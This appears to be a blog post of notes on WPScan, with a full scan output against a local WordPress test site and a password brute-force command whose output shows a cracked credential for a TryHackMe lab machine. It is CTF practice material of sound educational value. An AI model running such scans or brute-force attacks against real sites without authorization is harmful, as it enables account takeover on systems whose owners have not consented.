Skip to main content

WPScan - WordPress Security Scanner

https://wpscan.com/wordpress-security-scanner

Source code on GitHub: https://github.com/wpscanteam/wpscan

# wpscan --url http://127.0.0.1:8080
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://127.0.0.1:8080/ [127.0.0.1]
[+] Started: Sat Mar 13 09:41:21 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:8080/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://127.0.0.1:8080/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:8080/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.5 identified (Insecure, released on 2018-04-03).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:8080/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:8080/, Match: 'WordPress 4.9.5'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <===========================================> (22 / 22) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 13 09:41:32 2021
[+] Requests Done: 47
[+] Cached Requests: 4
[+] Data Sent: 11.353 KB
[+] Data Received: 122.766 KB
[+] Memory used: 193.074 MB
[+] Elapsed time: 00:00:11
#

Brute force password

wpscan --url http://10.10.87.140/wordpress -U elyana -P pass2.txt
...
[!] Valid Combinations Found:
 | Username: elyana, Password: H@ckme@123
...

Practice

>>> THM | Cyber Scotland 2021

>>> THM | Badbyte

>>> THM | Wekor

>>> THM | Internal

>>> THM | Different CTF

Labels:

Popular posts from this blog

Hydra: Notes

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Read more

Office 365: Alert Policies - Creation of forwarding/redirect rule

The default Creation of forwarding/redirect rule alert policy will be triggered when end-users create rule to forward or redirect mail
Read more

Free Software Foundation

Richard Stallman founded the Free Software Foundation in 1985 to support the free software movement, promoting the universal freedom to study, distribute, create and modify computer software.
Read more